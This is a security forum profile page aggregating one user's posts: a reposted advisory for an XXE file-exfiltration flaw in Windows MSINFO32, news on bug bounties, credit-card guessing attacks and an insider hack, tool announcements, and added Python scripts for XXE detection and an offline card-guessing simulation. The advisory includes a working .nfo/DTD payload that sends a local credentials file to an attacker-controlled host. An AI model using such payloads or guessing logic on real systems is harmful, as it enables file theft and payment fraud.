Nytro

Administrators
  • Posts

    18789
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. [+] Credits: John Page aka hyp3rlinx
     [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
     [+] ISR: ApparitionSec

     Vendor:
     =================
     www.microsoft.com

     Product:
     ==========================
     Windows System Information
     MSINFO32.exe v6.1.7601

     Windows MSINFO32.EXE displays a comprehensive view of your hardware, system components, and software environment.

     Parameters
     FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.

     Vulnerability Type:
     ===================
     XML External Entity

     CVE Reference:
     ==============
     N/A

     Vulnerability Details:
     =====================
     Microsoft Windows MSINFO32.exe is vulnerable to an XML External Entity attack which can potentially allow remote attackers to gain access to and exfiltrate files from the victim's computer if they open a malicious ".nfo" file via a remote share / USB etc. Upon opening the file the user will see an error message like "System Information is unable to open this .nfo file. The file might be corrupt" etc.

     Tested: Windows 7 SP1

     Exploit code(s):
     ===============
     Access and exfiltrate the Windows "msdfmap.ini" file as a trivial POC. This file contains credentials for MS ADO Remote Data Services.

     1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)

     2) "payload.dtd"

        <?xml version="1.0" encoding="UTF-8"?>
        <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
        %all;

     3) "FindMeThatBiatch.nfo" (corrupt .NFO file)

        <?xml version="1.0"?>
        <!DOCTYPE HYP3RLINX [
        <!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
        <!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
        %dtd;]>
        <pwn>&send;</pwn>

     Double click to open FindMeThatBiatch.nfo; the user gets an error, MSINFO32 opens... the attacker gets files.
     OR open via the Windows command line: c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo

     Disclosure Timeline:
     ======================================
     Vendor Notification: September 4, 2016
     Vendor Reply "not meet the bar for security servicing": September 7, 2016
     December 4, 2016 : Public Disclosure

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ================
     High

     [+] Disclaimer
     The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

     hyp3rlinx

     Source: https://www.exploit-db.com/exploits/40864/
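As an added example (this is not part of the advisory or of hyp3rlinx's PoC), the following Python 3 script does two things a practitioner wants around this bug: it flags a .nfo/.xml file that declares external entities or pulls in a remote DTD before the file is handed to a viewer that resolves them, and it decodes what the attacker's `SimpleHTTPServer` access log shows once the payload fires (the file contents travel in the query string, percent-encoded). The sample .nfo and DTD are the advisory's PoC; the access-log line, `attacker-ip` and the `[connect default]` text are constructed placeholders, not real msdfmap.ini content.

```python
import re
from collections import namedtuple
from urllib.parse import unquote

Entity = namedtuple("Entity", "name uri parameter")

# Constructed samples, copied from the advisory's PoC (attacker-ip is a placeholder).
SAMPLE_NFO = b"""<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\\Windows\\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""
SAMPLE_DTD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
%all;
"""
# Constructed access-log line in SimpleHTTPServer's format; the query string is NOT
# real msdfmap.ini content, just a placeholder INI line followed by CRLF.
SAMPLE_LOG = ('10.0.0.5 - - [04/Dec/2016 20:15:01] '
              '"GET /?%5Bconnect%20default%5D%0D%0A HTTP/1.1" 200 -')

# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM 'uri'> and the PUBLIC "id" "uri" form.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+(?:SYSTEM|PUBLIC)\s+'
    r'''(?:(["'])[^"']*\3\s+)?(["'])(?P<uri>[^"']*)\4''',
    re.IGNORECASE)

# A parameter-entity reference such as %dtd; expanded inside the DOCTYPE internal subset.
PE_REF_RE = re.compile(r'%[A-Za-z_][\w.-]*;')


def external_entities(data: bytes):
    """Every SYSTEM/PUBLIC entity declared in the file, in document order."""
    text = data.decode("utf-8", errors="replace")
    return [Entity(m.group("name"), m.group("uri"), m.group("param") is not None)
            for m in ENTITY_RE.finditer(text)]


def xxe_indicators(data: bytes):
    """Reasons not to open this file in a viewer that resolves entities (empty list = clean)."""
    text = data.decode("utf-8", errors="replace")
    reasons = []
    for ent in external_entities(data):
        kind = "parameter" if ent.parameter else "general"
        reasons.append(f"{kind} entity {ent.name!r} loads external resource {ent.uri!r}")
    if "<!DOCTYPE" in text.upper() and PE_REF_RE.search(text):
        reasons.append("DOCTYPE expands a parameter entity (remote DTD include)")
    return reasons


REQUEST_RE = re.compile(r'"GET\s+(?P<target>\S+)\s+HTTP/')


def decode_exfil(log_line: str) -> str:
    """Recover the exfiltrated text from one access-log line of the attacker's listener.
    The payload puts the file contents after '?', so percent-decoding the query gives
    the original bytes back (CR/LF arrive as %0D%0A)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        raise ValueError("not an access-log line with a GET request")
    _, _, query = m.group("target").partition("?")
    return unquote(query)


if __name__ == "__main__":
    for reason in xxe_indicators(SAMPLE_NFO):
        print("BLOCK:", reason)
    print(repr(decode_exfil(SAMPLE_LOG)))
```

The regex check is deliberately independent of any XML parser: the whole point is to decide before a resolving parser touches the file. Running it over a mail gateway's attachments or a share's *.nfo files catches this payload and the usual single-stage XXE variants alike.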
  2. INFILTRATE 2016: Genetic Malware - Travis Morrow / Josh Pitts (Immunity Videos)
  3. Hacking is legal again finally (sometimes)
     By Cameron Camp, posted 6 Dec 2016 - 02:00PM

     Go ahead and hack your car, that's fine now. Go ahead and hack the Department of Defense, that's okay too under new policies. This doesn't mean you have a license to do unlimited badness; it means the US authorities have finally become more welcoming to research efforts to uncover bugs that could potentially create holes for the bad guys. You won't get sued (unless you do something of epic stupidity).

     It wasn't always this way. For years, auto enthusiasts have customized their cars for better performance. Nowadays, those same cars are driven by computers that control everything. But until recently, laws technically prohibited them from adjusting fuel management, for example, to increase performance. Why? The manufacturers argued they were hacking software the manufacturers own and that the car owners only have a license to use. It was a sort of DRM (Digital Rights Management) for the car you bought. This meant you may own the car and have a right to modify it, but you couldn't legally touch the software that ran it all.

     Not so anymore. This came to a head in recent years when tractor owners attempted to modify the computer software on their high-priced farming machines and fell afoul of the manufacturer's attorneys. The manufacturer argued the tractor owners only had a license to use under certain conditions, but not to modify. The owners argued the software didn't do what they wanted, and limited the use of the vehicle they purchased. Some went elsewhere and bought competing equipment. Some kept hacking. It's hard to imagine a band of rogue farmers slinking around the farm with hacked laptops bent on doing evil deeds though. They just wanted their tractors to work as they thought was necessary.

     The jumping-off point, legally, was laws that sought to keep copyright infringers from stealing works like music. So, too, the automotive manufacturers jumped on the legal bandwagon to hopefully prevent people from modifying their cars and tractors, possibly causing problems. But what applies to music seems clumsy at best when applied to hacking the rest of the software that drives your life (and tractor).

     But then researchers who were working for the good guys couldn't really expose flaws without fear of reprisal. By far, the majority of people looking for flaws in their own equipment were not interested in harming their own equipment or themselves. They wanted to improve things. But they also didn't want to get sued while doing good deeds, so the motivation to help was low.

     But what about the bad guys? The scammers, an ever-present threat, were free to test as much as they liked. And without researchers trying to help, millions of potential threat vectors wouldn't be tested or responsibly disclosed, resulting in millions of potential attacks that could hamper devices in droves.

     Increasingly, progressive software companies welcome researchers, and even add to the interest by offering rewards for willing researchers bent on uncovering flaws. These "bug bounty" programs have been amazingly successful, sometimes helping the software companies uncover hundreds of flaws before they are exploited.

     Not so much with the car manufacturers. Until now, you were unlikely to receive a warm welcome if you reported a flaw in the software that runs your car, and you just might get a legal letter. But now some manufacturers are relaxing that approach by rolling out bug submission processes. Basically, companies like General Motors are now enlisting your help as a researcher. That's great news for us all.

     Hacking the Fed

     If you were nervous about hacking your car, you were mortified to hack the U.S. Government (unless you're a scammer, then it might be your day job). Auto manufacturers might send nasty letters, but probably not black vans to haul you off. Not so with the government. Notoriously devoid of a sense of humor, the fed doesn't take kindly to exploit attempts which you feel are really interesting and novel. Until now.

     Seemingly, the bug bounty wisdom has shined its light on the Fed. What's the result? If you abide by their rules of engagement, you can fix holes for the greater good that will help protect us all. That's not to say their efforts are perfect, and you should just go nuts and port scan the whole government and start hammering, but if you exercise some modicum of common sense (and maybe read the rules of engagement), they want to hear from you.

     The U.S. Army does too. Seems the word is getting around that not only can this help to keep us all safe, you may also show up on their radar as a researcher interested in helping the Army, and not end up in the crosshairs of a very large adversary in the process. It's a welcome respite from the draconian views of only a few years ago, when it felt like taking your life in your own hands if you endeavored to explore the world for vulnerabilities and report them.

     How's it working?

     At least one auto manufacturer is reporting hundreds of flaws discovered, which they then can fix, and all without hiring a raft of expensive (and difficult to find and hire) researchers. Is it a perfect system? No. But nothing is. It is, however, a good start and a nice gesture to the community. So now you can come clean about hacking your car, even if it runs much worse since you started.

     Source: http://www.welivesecurity.com/2016/12/06/hacking-legal-finally-sometimes/
  4. [Video] How to Hack a Credit Card in 6 Seconds, Experts Reveal
     Monday, December 05, 2016 - Swati Khandelwal

     As India attempts an upgrade to a cashless society, cyber security experts have raised serious concerns and revealed how to find credit card information, including expiration dates and CVV numbers, in just 6 seconds. And what's more interesting? The hack uses nothing more than guesswork by querying multiple e-commerce sites.

     In a new research paper entitled "Does The Online Card Payment Landscape Unwittingly Facilitate Fraud?", published in the academic journal IEEE Security & Privacy, researchers from the University of Newcastle explain how online payments remain a weak spot in credit card security, which makes it easy for fraudsters to retrieve sensitive card information.

     The technique, dubbed Distributed Guessing Attack, can circumvent all the security features put in place to protect online payments from fraud. A similar technique is believed to be responsible for the hack of thousands of Tesco customers in the U.K. last month.

     The issue relies on the Visa payment system, where an attacker can guess and attempt all possible permutations and combinations of expiration dates and CVV numbers on hundreds of websites. Researchers discovered two weaknesses in the way online transactions are verified using the Visa payment system. They are as follows:

     - Online payment systems do not detect multiple incorrect payment requests if they're performed across multiple sites. They also allow a maximum of 20 attempts per card on each site.
     - Web sites do not run checks regularly, varying the card information requested.

     Newcastle University PhD candidate Mohammed Ali says neither weakness is alone too severe, but when used together and exploited properly, a cyber criminal can recover a credit card's security information in just 6 seconds, presenting "a serious risk to the whole payment system."

     Here's how the attack works:

     The attack is nothing but a very clever brute force attack that works against some of the most popular e-commerce sites. So, instead of brute-forcing just one retailer's website, which could trigger a fraud detection system due to incorrect guesses or lock the card, the researchers spread out guesses for the card's CVC number across multiple sites, with each attempt narrowing the possible combinations until a valid expiration date and CVV number are determined.

     The video demonstration shows that it only takes 6 seconds for a specially designed tool to reveal a card's secure code.

     First, an attacker needs a card's 16-digit number, which can be obtained either from black-market websites for less than $1, or from a smartphone equipped with a near-field communication (NFC) reader to skim them. Once a valid 16-digit number is obtained, the hacker uses web bots to brute force the three-digit card verification value (or CVV) and expiration date on hundreds of retailers at once. The CVV takes a maximum of 1,000 guesses to crack and the expiry date takes no more than 60 attempts. The bots then work to obtain the billing address, if required. The paper suggests the whole attack can be carried out in just 6 seconds.

     "These experiments have also shown that it is possible to run multiple bots at the same time on hundreds of payment sites without triggering any alarms in the payment system," researchers explain in the paper. "Combining that knowledge with the fact that an online payment request typically gets authorized within two seconds makes the attack viable and scalable in real time. As an illustration, with the website bot configured cleverly to run on 30 sites, an attacker can obtain the correct information within four seconds."

     The attack works against Visa card customers, as the company does not detect multiple attempts to use a card across its network, while MasterCard detects the brute force attack after fewer than 10 attempts, even when the guesses are spread across multiple websites.

     How to Protect yourself?

     The team investigated the Alexa top-400 online merchants' payment websites and found that the current payment platform facilitates the distributed guessing attack. The researchers contacted the 36 biggest websites against which they ran their distributed card number-guessing attack and notified them of their findings. As a result of the disclosure, eight sites have already changed their security systems to thwart the attacks. However, the other 28 websites made no changes despite the disclosure.

     For Visa, the best way to thwart the distributed card number-guessing attack is to adopt a similar approach to MasterCard and lock a card when someone tries to guess card details multiple times, even when tried across multiple websites. For customers, avoid using Visa credit or debit cards for making online payments, always keep an eye on your statements, and keep the spending limit on your Visa card as low as possible.

     Source: https://thehackernews.com/2016/12/credit-card-hacking-software_5.html
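To make the two weaknesses concrete, here is an added simulation (not code from the paper or the article, and it makes no network requests). Merchants enforce the article's 20-attempts-per-card limit locally and differ in which fields they ask for, so expiry can be guessed on PAN+expiry sites and the CVV afterwards on sites that check both. The issuer either keeps no cross-merchant count (the behaviour the article attributes to Visa) or locks the card after 10 failures counted over every merchant (the MasterCard behaviour it describes). The test PAN, the 60 merchants of each kind and the December 2016 starting point for expiry guesses are constructed assumptions.

```python
class Card:
    """Constructed test card; 4111 1111 1111 1111 is a standard Visa test PAN, not a real account."""
    def __init__(self, pan, expiry, cvv):
        self.pan, self.expiry, self.cvv = pan, expiry, cvv


class Issuer:
    """Authorises what merchants forward. network_lock=None: failures at one merchant are
    invisible to the others (weakness 1 as the article describes Visa). network_lock=N:
    the card is locked after N failed attempts counted across all merchants (MasterCard)."""
    def __init__(self, card, network_lock=None):
        self.card, self.network_lock = card, network_lock
        self.failures, self.locked = 0, False

    def authorize(self, pan, expiry=None, cvv=None):
        if self.locked or pan != self.card.pan:
            return False
        ok = ((expiry is None or expiry == self.card.expiry) and
              (cvv is None or cvv == self.card.cvv))
        if not ok:
            self.failures += 1
            if self.network_lock is not None and self.failures >= self.network_lock:
                self.locked = True
        return ok


class Merchant:
    """A checkout page asking for `fields` besides the PAN. It refuses a card after `limit`
    attempts, but that counter lives only on this site (so the attacker just moves on)."""
    def __init__(self, name, fields, issuer, limit=20):
        self.name, self.fields, self.issuer, self.limit = name, fields, issuer, limit
        self.attempts = {}

    def checkout(self, pan, expiry, cvv):
        n = self.attempts.get(pan, 0)
        if n >= self.limit:
            return None  # site-local limit reached
        self.attempts[pan] = n + 1
        return self.issuer.authorize(pan,
                                     expiry if "expiry" in self.fields else None,
                                     cvv if "cvv" in self.fields else None)


def guess_field(pan, candidates, merchants, request):
    """Try candidates in order, switching merchant whenever one refuses.
    Returns (winning candidate or None, attempts made, merchants used)."""
    remaining = list(merchants)
    site = remaining.pop(0) if remaining else None
    attempts, used = 0, (1 if site is not None else 0)
    for cand in candidates:
        result = None
        while site is not None and result is None:
            result = site.checkout(pan, *request(cand))
            if result is None:
                site = remaining.pop(0) if remaining else None
                used += 1 if site is not None else 0
        if site is None:
            break  # every merchant exhausted
        attempts += 1
        if result:
            return cand, attempts, used
    return None, attempts, used


def expiry_candidates(start=(12, 2016), months=60):
    """(month, year) pairs from `start` onward; the article's bound is 60 guesses."""
    m, y = start
    for _ in range(months):
        yield (m, y)
        m, y = (1, y + 1) if m == 12 else (m + 1, y)


def distributed_guessing_attack(pan, expiry_sites, cvv_sites):
    """Weakness 2: expiry on sites that check only PAN+expiry, then CVV where both are checked."""
    expiry, a1, s1 = guess_field(pan, expiry_candidates(), expiry_sites, lambda e: (e, None))
    if expiry is None:
        return {"found": False, "attempts": a1, "sites_used": s1}
    cvv, a2, s2 = guess_field(pan, ("%03d" % i for i in range(1000)), cvv_sites,
                              lambda c: (expiry, c))
    return {"found": cvv is not None, "expiry": expiry, "cvv": cvv,
            "attempts": a1 + a2, "sites_used": s1 + s2}


def simulate(network_lock=None, sites=60):
    card = Card("4111111111111111", (6, 2019), "123")   # constructed secrets
    issuer = Issuer(card, network_lock)
    expiry_sites = [Merchant("shop%d" % i, ("expiry",), issuer) for i in range(sites)]
    cvv_sites = [Merchant("store%d" % i, ("expiry", "cvv"), issuer) for i in range(sites)]
    result = distributed_guessing_attack(card.pan, expiry_sites, cvv_sites)
    result["card_locked"] = issuer.locked
    return result


if __name__ == "__main__":
    print("per-site limits only:", simulate())
    print("network-wide lock after 10 failures:", simulate(network_lock=10))
```

With per-site limits only, the card falls after 155 authorisations spread over 9 merchants and no merchant ever sees more than 20 attempts; with the network-wide counter the card is locked during the first 10 expiry guesses and every later attempt fails, whichever merchant it goes through. The check that matters is therefore keyed on the PAN at the issuer, not on the merchant.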
  5. Expedia IT guy made $300,000 by hacking own execs
     by Matt Egan (@mattmegan5), December 6, 2016: 8:25 AM ET

     A former Expedia IT professional admitted on Monday to illegally trading on secrets he discovered by hacking his own company's senior executives.

     Jonathan Ly stole passwords and infiltrated devices of Expedia's (EXPE) chief financial officer and head of investor relations, allowing him to make a series of "highly profitable" trades in stock options that scored him $331,000, according to prosecutors.

     Ly, a senior IT technician in Expedia's Hotwire.com division, pleaded guilty to securities fraud in U.S. District Court in Seattle. The 28-year-old will have to repay the illegal profits he made from insider trading.

     Prosecutors say that between 2013 and 2016, Ly exploited his ability to remotely access electronic devices used by Expedia execs to access documents and emails containing confidential information. For instance, the SEC said Ly targeted information prepared by Expedia's head of investor relations summarizing how the market may react to certain announcements. Access to that kind of secret info before it's publicly released can be very valuable, given how news can cause stocks to move dramatically.

     U.S. Attorney Annette Hayes said in a statement that an FBI investigation revealed that Ly "used his employer's networks to facilitate a get-rich-quick scheme."

     Ly's lawyer, John Runfola, said his client is "deeply sorry" and noted that he is a young man who came from an "impoverished background." "He has certainly learned his lesson," Runfola told CNNMoney.

     According to the authorities, the insider trading scheme continued even after he left Expedia last year. They say Ly kept an Expedia laptop without the knowledge of his company and continued to access devices and email accounts used by senior company execs to trade. Prosecutors say Ly even made it appear that other Expedia employees were the ones using the devices.

     Ly faces potential jail time, as securities fraud is punishable by up to 25 years in prison and a $250,000 fine. He is scheduled to be sentenced on February 28, 2017.

     Hayes said Expedia quickly contacted the FBI when it discovered the scheme. Expedia said in a statement to CNNMoney that it detected the intrusion by using "enhanced monitoring practices we had in place." The company said it "worked closely with law enforcement authorities to identify, track, pursue and put a halt to these activities."

     Ly has agreed to repay Expedia for the $81,592 the company spent investigating the computer intrusion. The SEC settlement, subject to court approval, requires Ly to pay $375,907, including interest.

     Jay Tabb Jr., the FBI special agent in charge, said this case was "particularly egregious" because Ly violated the "trust of the public" as well as "violated the privacy of fellow employees."

     CNNMoney (New York), first published December 5, 2016: 4:51 PM ET

     Source: http://money.cnn.com/2016/12/05/technology/expedia-hack-insider-trading-sec/index.html
  6. Linux Fundamentals Paul Cobbaut Publication date 2015-05-24 CEST Abstract This book is meant to be used in an instructor-led training. For self-study, the intent is to read this book next to a working Linux computer so you can immediately do every subject, practicing each command. This book is aimed at novice Linux system administrators (and might be interesting and useful for home users that want to know a bit more about their Linux system). However, this book is not meant as an introduction to Linux desktop applications like text editors, browsers, mail clients, multimedia or office applications. More information and free .pdf available at http://linux-training.be . Download: http://linux-training.be/linuxfun.pdf
  7. Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study - Presented By Yuki Chen and Linan Hao
  8. I updated to 4.1.17: https://invisionpower.com/release-notes/ Post here if there are problems. So far there have been, which is why the forum isn't working.
  9. See these:
     - http://www.macworld.co.uk/how-to/iosapps/how-downgrade-ios-10-how-go-back-ios-9-reinstall-ios-9-3522302/
     - http://www.howtogeek.com/230144/how-to-downgrade-to-an-older-version-of-ios-on-an-iphone-or-ipad/
     - https://fieldguide.gizmodo.com/how-to-downgrade-ios-9-3-to-an-older-version-1767689167
     PS: I haven't tried it, but I may try (if needed; I hope it won't be) next week.
  10. That's normal, the template shows until the requests that fetch the data complete. @Gecko can you put a generic "Loading" something over the whole page until it loads?
  11. Something about the "classic" web vulnerabilities, which I wrote many years ago, maybe it's useful to you: http://dgaspcsm.ro/Vulnerabilitati Web si securizarea.pdf For the others, see the OWASP Testing Guide.
  12. Yes, a classic "PE Backdoor" example, but he forgot to do "Realign PE Header" (Number of Sections, Size of Code... will differ); it works though.
  13. Epic!
  14. Has anyone tried 3.4? Does it work? Use a virtual machine for testing.
  15. I checked the code (not really in detail) and it looks like this:
     - It unloads the VirtualBox driver if it is already running
     - It loads a vulnerable VirtualBox driver -> WHICH IS SIGNED AND ALLOWED TO RUN (if you download this https://github.com/hfiref0x/TDL/blob/master/Source/Furutaka/drv/vboxdrv_exploitable.sys and check its properties you can see this)
     - It exploits a vulnerability in the vulnerable driver
     - It executes shellcode in the kernel context -> here you are able to load (minimal) another kernel module
     This is the bypass of "Driver Signature Enforcement" avoiding PatchGuard (which DSEFix would trigger). I am not really sure what I say is true; if I have some time, I will take a more detailed look.
  16. Don't use that Bundle junk (Firefox).
  17. The last useful stuff I saw on this subject was this one: http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html
     And you should also check this: https://github.com/hfiref0x/TDL
     However, I think they are working from time to time on this, so even if some bypasses are found, they are "probably" fixed. Also, you should take into consideration, from here: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/driver-signing
     "Note: Windows 10 for desktop editions (Home, Pro, Enterprise, and Education) and Windows Server 2016 kernel-mode drivers must be signed by the Windows Hardware Dev Center Dashboard, which requires an EV certificate. For details, see Driver Signing Changes in Windows 10."
     Also, check this: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later-
     Tools: https://github.com/tandasat/PgResarch and https://github.com/tandasat/findpg
  18. DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation, so it can be used by both professionals and non-experts to quickly and easily conduct a digital investigation and perform incident response.

     DFF follows three main goals:

     - Modularity: contrary to the monolithic model, the modular model is based on a core and many modules. This modular conception presents two advantages: it permits rapid improvement of the software and lets developers split tasks easily.
     - Scriptability: it is obvious that the ability to be scripted gives more flexibility to a tool, but it also enables automation and gives the possibility to extend features.
     - Genericity: the project tries to remain Operating System agnostic. We want to help people where they are, letting them choose any Operating System to use DFF.

     Amongst the supported features of DFF:

     - Automated analysis: mount partitions and file systems and extract file metadata and other useful information in an automated way; generate an HTML report with System & User activity
     - Direct device reading support
     - Supported forensic image file formats: AFF, E01, Ex01, L01, Lx01, dd, raw, bin, img
     - Supported volumes & file systems, with unallocated space, deleted items, slack space, ...: DOS, GPT, VMDK, Volume Shadow Copy, NTFS, HFS+, HFSX, EXT2, EXT3, EXT4, FAT12, FAT16, FAT32
     - Embedded viewers for videos, images, pdf, text, office documents, registry, evt, evtx, sqlite, ...
     - Outlook and Exchange mailboxes (PAB, PST, OST)
     - Metadata extraction: compound files (Word, Excel, Powerpoint, MSI, ...), Windows Prefetch, Exif information, LNK
     - Browser history: Firefox, Chrome, Opera
     - System & Users activity: connected devices, user accounts, recent documents, installed software, network, ...
     - Volatile memory analysis with a graphical interface to Volatility
     - Video thumbnail generation
     - Support for Sqlite, Windows Registry, Evt and Evtx
     - Full Skype analysis (Sqlite and old DDB format)
     - Timeline based on all gathered timestamps (file systems and metadata)
     - Hashset support with automatic "known bad", "known good" tagging
     - Mount functionality to access recovered files and folders from your local system
     - In place carving
     - ...

     Source: https://github.com/arxsys/dff
  19. Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Description Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like "drozer" that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent. Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device. Needle is open source software, maintained by MWR InfoSecurity. Link: https://github.com/mwrlabs/needle
  20. hunter
     (l)user hunter using WinAPI calls only

     Introduction:
     During Red Team engagements it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user (no matter how, always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he is a local administrator in any box, to which groups he belongs, if he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout.

     You might be thinking, "use PowerView". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware how powerful PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this.

     To avoid using multiple old school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the amount of tools uploaded to compromised systems I created a simple tool that doesn't require Administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with whitelist bypass and process evasion, but I'll leave that for another day.

     Link: https://github.com/fdiskyou/hunter
  21. BSLV16 - BSidesLV playlist, 77 videos, last updated on Nov 17, 2016

     - Opening Keynote Pt. I & II - Lorrie Cranor (FTC), Michael Kaiser (NCSA) (36:18)
     - Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb (26:27)
     - Managing Security with the OWASP Assimilation Project - Alan Robertson (40:17)
     - Toward Better Password Requirements - Jim Fenton (56:33)
     - Data Science or Data Pseudo-Science? - Ken Westin (41:51)
     - I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman (23:33)
     - Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis (1:28:31)
     - Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari (29:19)
     - Intro to Storage Security, Looking Past the Server - Jarett Kulm (24:47)
     - Are You a PenTexter? - Peter Mosmans, Melanie Rieback (43:41)
     - Deep Adversarial Architectures for Detecting (and Generating) Maliciousness - Hyrum Anderson (39:09)
     - I Am The Cavalry Panel: Progress on Cyber Safety (35:50)
     - Welcome to The World of Yesterday, Tomorrow! - Joel Cardella (46:46)
     - Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson (49:06)
     - Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis (55:23)
     - Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It (23:07)
     - How to Get and Maintain your Compliance without ticking everyone off - Rob Carson (23:13)
     - What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh (35:32)
     - Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman (55:08)
     - State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, Beau Woods (56:46)
     - State Of Automotive Cyber Safety - IATC - Joshua Corman (48:53)
     - DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer (25:44)
     - Defeating Machine Learning: Systemic Deficiencies for Detecting Malware (45:14)
     - Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage (46:23)
     - CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman (47:56)
     - Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats (52:51)
     - Evaluating a password manager - Evan Johnson (31:26)
     - Why does everyone want to kill my passwords? - Mark Burnett (32:11)
     - How to make sure your data science isn't vulnerable to attack - Leila Powell (57:19)
     - DYODE: Do Your Own DiodE for Industrial Control Systems - Ary Kokos, Arnaud Soullie (43:10)
     - Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt (1:00:45)
     - Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer (32:23)
     - IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods (12:44)
     - Mapping the Human Attack Surface - Louis DiValentin (Master Chen) (26:19)
     - Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor (29:57)
     - Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter (47:07)
     - Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone (39:07)
     - A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland (23:19)
     - No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh (52:34)
     - Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett (26:10)
     - Powershell-Fu - Hunting on the Endpoint - Chris Gerritz (27:38)
     - Labeling the VirusShare Corpus: Lessons Learned - John Seymour (30:21)
     - There is no security without privacy - Craig Cunningham (30:35)
     - Survey says... Making progress in the Vulnerability Disclosure Debate - Allan Friedman (1:27:38)
     - Domains of Grays - Eric Rand (38:29)
     - Automated Dorking for Fun and Pr^wSalary - Filip Reesalu (13:17)
     - [Private Video]
     - You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling (28:29)
     - Six Degrees of Domain Admin... - Andy Robbins, Will Schroeder, Rohan Vazarkar (51:51)
     - Uncomfortable Approaches - Joshua Corman, Beau Woods (45:37)
     - Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay (26:37)
     - PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven (16:22)
     - CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers (41:12)
     - Hacking Megatouch Bartop Games - Mark Baseggio (34:54)
     - Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation (58:58)
     - Is that a penguin in my Windows? - Spencer McIntyre (39:48)
     - Automation Plumbing - Ashley Holtz & Kyle Maxwell (25:06)
     - Disclosing Passwords Hashing Policies - Michal Spacek (33:12)
     - PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan (51:00)
     - Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett (56:15)
     - An Evolving Era of Botnet Empires - Andrea Scarfo (28:28)
